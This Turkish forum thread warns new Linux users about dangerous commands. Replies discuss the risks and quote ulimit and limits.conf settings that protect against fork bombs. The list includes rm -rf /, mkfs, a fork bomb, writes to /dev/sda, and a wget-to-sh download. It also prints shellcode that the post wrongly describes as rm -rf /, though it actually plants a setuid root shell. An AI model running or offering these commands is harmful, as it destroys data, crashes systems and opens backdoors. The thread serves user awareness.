Güvenlik : Bu komutlara dikkat!

[Xenophobia]

Eğer linuxda yeni iseniz, bazı forumlarda ya da sitelerde yazılan herşeye inanmamanız sisteminizin sağlığı ve bilgilerinizin güvenliği açısından son derece önemli.

Okudugunuz ya da gördüğünüz her komutunu denemeye kalkışmamalısınız, öncelikle komutun ne yapmak için kullanıldığının anlaşılması son derece önemlidir.

Bir kaç zararlı komut hakkında sizleri bilgilendirelim,

1. rm –rf /

Bu komut çok tehlikelidir. Root dizininden başlayarak tüm dizinleri ve bu dizinlerin içerisinde bulunan tüm dizinleri siler.

2. char esp[] __attribute__ ((section(".text"))) /* e.s.p

release */

= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"

"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"

"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"

"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"

"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"

"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"

"\x6e\x2f\x73\x68\x00\x2d\x63\x00"

"cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;";

Bu komut rm –rf / komutunun hex halidirir. rm –rf / ile aynı sonuçları oluşturur.

3. mkfs.ext3 /dev/sda

Bu komut diskiniz üzerinde yer alan bilgileri formatlar.

4. : (){:|:&};:

Bu komut Forkbomb olarak bilinir. Sisteminize çalıştırabileceği kadar işlemi aynı anda çalıştırmasını söyler. Bir sürü işlem çalıştıran sistem belirli bir aşama sonra çöker.

5. any_command > /dev/sda

Bu komut sonucunda any_command kısmında kullanılan komutun sonucları disk üzerne yazılarak diskin dosya sistemine zarar verir.

6. wget http://some_untrusted_source -O- | sh

Kaynağını bilmediğiniz dosyaları asla indirip çalıştırmayınız. Aksi taktirde hackerlara kapılarınızı açmış olabilirsiniz. Bu komut kullanılırken alınacak paketin güvenilir olduğuna dikkat etmek lazımdır.

7. mv /home/yourhomedirectory/* /dev/null

Bu komut sizin home dizininizde bulunan bütün dosyaları siler. Bu dosyalara bir daha ulaşamadığını gibi sisteme giriş yapığınızda tüm kişisel bilgilerinizi kaybetmiş olursunuz.

Yazar : Caner Bulut

[FACTOR2]

Yararlı bir yazı olmuş.Teşekkürler.

[xxx3]

Teşekkürler sayenizde ubuntuyu biraz daha öğrendim 

[Gimp Uzmanı]

Teşekkürler. Hiç kullanmadığım ama dikkat edilmesi gereken komutlar.

[heartsmagic]

Böyle bir başlık açılmıştı zamanında ancak yanlış anlaşılabileceği için çöpe taşınmıştı. Sanırım üyeler tepki vermişti
Ben destekleyenler arasındaydım ancak demokrasi bizim de kellemizi kesmişti
Şimdi bakıyorum da herkes beğenmiş yazıyı.

[Xenophobia]

Neden tepki vermişlerdi ki? Bilmedikleri kötü şeyleri öğrendiklerini mi düşünüyorlardı yoksa?

Nihayetinde, sorununu çözmek isteyenler yüzlerce foruma giriyor, binlerce komut ile karşılaşıyor. Uzak duracaklarını bilmeleri hakları.

Fakat, yine sakıncalı görülüyorsa tekrar çöpe taşınabilir.

[olaki]

Aslında bilen bilir, bulan bulur ama yinede çapsız/kalitesiz bir hergelenin elinde ne olur düşünmüyor değilim hani...
Antivirüsleri denemek için bir virüs dosyasını forumda herkese açık tutmak gibi...
Dün bir zerzevat örneği vardı galiba...

[heartsmagic]

Yanlış hatırlamıyorsam iki türlüydü tepkiler. Birincisi yanlış kişilerin ele geçmesi, diğeri de dikkatsiz kullanıcıların olabileceği
Benim açımdan sorun yok, zaten bulan bir şekilde buluyor. Bilinçlendirme adına ben seviyorum böyle başlıkları.

[Felâsife]

Bir tehlikeli komutta [bence] bu fsck komutu,
Pardus'ta bir kaç kere işime yaramıştı ama bir keresinde de sistemi uçurmuştu.

Not:
Ubuntu da zaten otomatik olarak galiba her 30 açılışta fsck (dosya hatası) taraması yapılıyor.
O yüzden kullanmaya gerek yok. (Tabi özel durumlar olabilir.)

Örnektir:
sudo fsck.ext3 /dev/sdxx

[ODİN]

iyi hoş güzel insanları bilgilendirmişinzde benim gibi ubuntuya bilmem ne programını ararken o sayfadan o sayfaya yönlendirilen kod bilgisi olmayan lınux kullanıcıları bu durumda çok aciz kalıyoruz ukalalık yapmak istemem ama ubuntu sistemini yazanlar bu vb. zararlı komutlara karşı tedbir alablir masıl mı

mesela ben o kodlardan birini kopyalayıp yapıştırdım uçbirime uçbirim beni anlayabileceğim şekilde uyarmalı bun komutu gerçekten çalıştırmak istiyor musun diye böyle bir önlem zor olmasa gerek ya da uç birimden indirilecek deponun güvenli olup olmadığını ubuntu kendisi tespit edebilir

işte o zaman lınux sistemler sıradan kullanıcılarında can attığı sistemler olur

[heartsmagic]

iyi hoş güzel insanları bilgilendirmişinzde benim gibi ubuntuya bilmem ne programını ararken o sayfadan o sayfaya yönlendirilen kod bilgisi olmayan lınux kullanıcıları bu durumda çok aciz kalıyoruz ukalalık yapmak istemem ama ubuntu sistemini yazanlar bu vb. zararlı komutlara karşı tedbir alablir masıl mı

mesela ben o kodlardan birini kopyalayıp yapıştırdım uçbirime uçbirim beni anlayabileceğim şekilde uyarmalı bun komutu gerçekten çalıştırmak istiyor musun diye böyle bir önlem zor olmasa gerek ya da uç birimden indirilecek deponun güvenli olup olmadığını ubuntu kendisi tespit edebilir

işte o zaman lınux sistemler sıradan kullanıcılarında can attığı sistemler olur

Bazıları için belki. Örneğin rm -rf / komutu sanırım Debian sistemlerde uyarı veriyordu. Ancak ne yazık ki her şeyi engellemenin bir yolu yok, kullanıcının kendisine kalıyor bazı şeyler. Mesela senin söylediğin depo işi zaten geçerli. Bu depolar harici kaynaklardır ve elle eklemen durumunda senden güvenlik anahtarı isterler.

[badhero]

Bilmediğim komutları zaten kullanmam, ama bu tarz "ölümcül" komutların varlığını öğrendikten sonra daha dikkatli olcam.

[heartsmagic]

Bir önceki iletime ek olsun:

Kod Seç Genişlet

rm -ir /

rm: cannot remove root directory "/'

Not: Deneyecekseniz bile lütfen -f ile denemeyin. Göze alıp ben bile denemedim, bu nedenle -i kullandım. -f denenecekse bile en güzeli sanal makinede denemektir. Yüksek ihtimalle -f kullanılsa bile sistem izin vermeyecektir fakat günlük kullanılan bir sistemde lütfen denemeyin.

[sdincsoy]

çok yararlı bilgiler. teşekkürü borç bilirim.
Ayrıca 4. madde çok enteresan geldi. root olmadan çalışır mı acaba bu komutlar ?
eğer çalışıyorsa kötü derim... Basit bir mail ya da scriptle sistemimin çökeceğini düşünmek bile istemem.
Ben 15 senedir bilgisayarla uğraşıyorum ancak linux da yeni sayilirim.
Sonuçta kullandığım kadarını biliyorum. Oysa bildiğim şeylerin linux un %5 i bile olduğunu sanmıyorum...
Böyle bilgilerin devamını dilerim.

[bytan]

4. madde için root yetkisine gerek yok. Yanlış hatırlamıyorsam bir süre önce buna berzer bir konu daha açılmıştı forumda.

http://en.wikipedia.org/wiki/Fork_bomb

Not: İlgili mesajı buldum:

http://forum.ubuntu-tr.net/index.php?topic=11488.msg142956#msg142956

[utdmr]

Ayrıca 4. madde çok enteresan geldi. root olmadan çalışır mı acaba bu komutlar ?

Evet, root olmadan da çalışabiliyor çünkü yetkisiz bir kullanıcı da standart olarak istediği kadar işlem başlatabilir. Bunu önlemek için bir işlemle kullanıcı başına açılabileck işlem sayısını sınırlayabiliyorduk sanırım.

[sdincsoy]

Forkbomb dan korunmak için;

Alıntıdır;
http://www.linuxnet.com.tr/modules.php?name=Forums&file=viewtopic&t=3122


Bugun linuxquestions.org'da konu gundeme gelince buraya yazayim dedim.

Cogu linux dagitiminin varsayilan (ontanimli) ayarlarinda siradan bir kullanicinin calistirabilecegi surec, acabilecegi dosya sayisi v.b. parametrelere ya sinir konmamistir ya da sinirlar yuksek tutulmustur. Bilgisayarinizi bir ev bilgisayari olarak kullanacaksaniz elbette bu bir sorun olusturmuyor. Ancak sunucu olarak kullanacaksaniz, ozellikle surec sayisina kisitlama getirilmemesi sonucu bu aciktan yararlanan saldirilar yasamaniz mumkun.

Bu saldirilar sistem guvenlik onlemlerini asan saldirilar degil; yani sifreleriniz, dosyalariniz guvendedir. Ancak, sisteminizin tum islemci gucu ve belleginin kullanilmasi sonucu sistem donma noktasina gelebilir.

Sahip oldugunuz kullaniciya konmus kisitlamalari gormek icin

Kod:

ulimit -a


komutunu kullanabilirsiniz. Calisabilecek surec sayisini diyelim 500 ile sinirlamak istersek

ulimit -u 500

dememiz yeterli. Sistem yoneticisi bu komutu /etc/profiles dosyasina koyarak siniri herkes icin gecerli yapabilir.

Ancak sinirlar iki cesit: Gevsek (soft) ve kati (hard). Gevsek sinirlar asilabiliyor. En guvenli yol, kati sinirlarla bu isi cozmek. Bunun icin, sisteminizin kullandigi guvenlik sistemine gore /etc/limits (shadow kullananlar icin) ya da /etc/security/limits.conf (PAM kullananlar icin) dosyalarini duzenleyebilirsiniz.

Ornegin, /etc/security/limits.conf ile, "users" grubundaki tum kullanicilar icin en fazla surec sayisinin 500 olmasini istiyorsak, dosyaya

Kod:
@users           hard    nproc           500


satirini ekliyoruz.

Onlem alindiktan sonra bash altinda asagidaki kodun sistemi zorlamamasi gerekir:
Kod:
){ :&:;};:

(Onlem almadiysaniz bu kodu denemeye kalkmayin).

Surec sayisi icin makul sinirin ne oldugu, bilgisayarinizda calisan programlara gore degisir. Cok dusuk tutulmasi halinde kullanicilar KDE, Gnome gibi programlari bile kullanamayabilirler.

[agritux]

Linux dünyasında bu bilgileri kötü amaçla kullanabilecek yoktur herhalde.
Bundan sonraki yazacaklarım belki çok tepki toplayacak ama;
Varsada anca Türklerden yani bizden çıkar diye düşünüyorum
Linuxu kullanma sebebimiz belli.
Bazılarımız ne anlama geldiğini bile bilmiyor
Felsefesi nedir, neden açık kaynak neden özgür yazılım vs...
Benimde tam olarak bildiğim söylenemez hani...

Herneyse; 4.komutu denemeyi çok isterdim. Çok merak ettim
acep sanal makinada denesek ne olur ?
Veya sistem nasıl çöküyor? birdaha açılmıyor mu?

[heartsmagic]

@sessizce, o an çakılır ancak açılır sistem.

Bu komutu denetenleri de biliyorum Örneğin bir IRC kanalında -isim vermeyeyim - Sonuç tahmin edilebilir sanırım, kanalın yarısı "Quit:  Connection reset by peer"

[agritux]

[ırmak]

Çok yararlı paylaşım.
Üstelik komutların denenmiş hallerini de gördüm.
Youtube'dan aratabilirsiniz;)
Mesela;
http://www.youtube.com/watch?v=wWOjmvWPRvQ&feature=fvst

[10ur_kaan]

teşşekur ederim sayenizde ubuntuyu yavas yavas ogreniyorum